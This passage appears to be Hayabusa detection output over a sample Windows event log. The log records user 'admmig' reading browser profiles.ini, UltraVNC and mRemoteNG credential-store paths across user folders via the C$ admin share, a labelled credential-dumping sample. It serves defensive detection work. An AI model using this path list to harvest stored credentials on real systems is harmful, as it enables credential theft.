+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE 
Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.814 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump 
via network share.evtx 2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.909 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 
10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
